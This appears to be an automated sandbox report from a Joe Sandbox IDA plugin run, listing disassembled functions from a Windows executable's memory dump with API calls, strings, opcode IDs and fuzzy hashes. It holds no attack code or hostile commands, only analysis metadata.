                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                        • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                        • Instruction ID: 592aa068e76b161936f1b55a260549e684eaf67f0eb96e9ee48f21353dea1455
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC128062E0824386FB20FE15D954379E651FB80750FD44076E6AA476C4FFBCE984CBA4
                                                                                                                                                                                                                        Function 00007FF7F25002E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                        • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                        • Instruction ID: 304f7198d5ffe4e35cc94dc911a0afe2e85398cb7d21020ba58979efe94d5917
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B812A321E0C18386FB24FE15E8147B9E252FB90754FD84171E6A9475CCEBBCE588CBA4
                                                                                                                                                                                                                        Function 00007FF7F24F1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                        • Opcode ID: b0576d739348d175249d0d30081f86d4c4af119df9e54cb96bd0ca74f2b2cf99
                                                                                                                                                                                                                        • Instruction ID: aa1cfba83c273cf22e2dc46a98029437902d9f9df779b8ecc7d5069a972d3fe2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0576d739348d175249d0d30081f86d4c4af119df9e54cb96bd0ca74f2b2cf99
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC417C21B0864292EB11BB12A9505B6E691BF88BD4F845031DD7D07BD5EEFCE905CBA0
                                                                                                                                                                                                                        Function 00007FF7F24F1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                        • Opcode ID: ef07a778ac6f4b189d319a3b2c4a36142f4d2eafadce42c8ab3247a85c27709a
                                                                                                                                                                                                                        • Instruction ID: 4c852eb40236947f756cb751b94a7b1252736ff5e6f08305782c5b2651a456b9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef07a778ac6f4b189d319a3b2c4a36142f4d2eafadce42c8ab3247a85c27709a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA415021B0864382EB20BB15A9505B6E3A0EF84B94FD45031DE7E07AD5EFFCE945CB90
                                                                                                                                                                                                                        Function 00007FF7F24FDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                        • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                        • Instruction ID: 60a4b3d528a0d81ef122d8c5d6f9e0e809b4b1384dde48734e8813c7aa5a76b8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6D16E32A08A418AEB20EB65D4403BDB7A0FBD5788F500135EE6D57BD5DFB8E881C790
                                                                                                                                                                                                                        Function 00007FF7F24FCFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD06D
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD07B
                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD0A5
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD113
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD11F
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                        • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                        • Instruction ID: faf3904b7a9b263972f907c1f8751e561ca12767ac7b47ceb65db5a53393ebc2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3631C52571A642C5EF11BB52A800175A394BF88B68F990535DD3D077C4DFFCE842C7A0
                                                                                                                                                                                                                        Function 00007FF7F250A460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                        • Opcode ID: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                        • Instruction ID: 725f8d7a0293af2804753239da40433c2b76099fa6d9ee8af2b16118fd845b8c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF21AF25A0C65342FB68FF615A4517CE1525F487B0F9407B4DA3E0BADAFDACB400C3A0
                                                                                                                                                                                                                        Function 00007FF7F251707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                        • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                        • Instruction ID: ec8acafa978b0dad1182107668e5814f367463c4f8853bcec9570611c6a7afd7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D119031B18B4286E750AF56E854329A2A0FB88BF4F841274EA2D877D4DFBCE404C790
                                                                                                                                                                                                                        Function 00007FF7F24F81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F821D
                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F827A
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F24F3FA4,00000000,00007FF7F24F1925), ref: 00007FF7F24F86E9
                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F8305
                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F8364
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F8375
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F838A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                        • Opcode ID: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                                                                                                                                                        • Instruction ID: 5ad1520c462c56ad0de67f23084335b386deeb2e96a932fe45747cd30428790c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB41A462A1968281EB30AB11A4102BAB394FFC9B80F854135DF7D5BBD5DEFCE801C790
                                                                                                                                                                                                                        Function 00007FF7F250A5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A5E7
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A61D
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A64A
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A65B
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A66C
                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A687
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                        • Opcode ID: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                        • Instruction ID: 7469fd31dbf96ecdb77b1f96fcc2aa4d74857528f80572f5ce3b906542680a73
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27119D21E0865342FB68FFA15A51178E2525F487B0F9443B4DA3E0B7D6FEACB400C3A0
                                                                                                                                                                                                                        Function 00007FF7F24F2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                        • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                        • Instruction ID: b44d5b505f4816dc323e175d8faa42a9de21cd907febaae9aab9dbcfdd6134b3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF318232609A8289EB20EF61E8552FAB360FF89794F840135EE6D47B99DFBCD504C750
                                                                                                                                                                                                                        Function 00007FF7F24F2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                        • API String ID: 1878133881-640379615
                                                                                                                                                                                                                        • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                        • Instruction ID: 231e793895f5eea59f7acf7d6fbdef1e69661cef1247993db60a5348d851f1fc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10217672628A8681E720EB10F4517EAA364FFC4784FC01136EA9C03AD9DFBCD645CB90
                                                                                                                                                                                                                        Function 00007FF7F2508DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
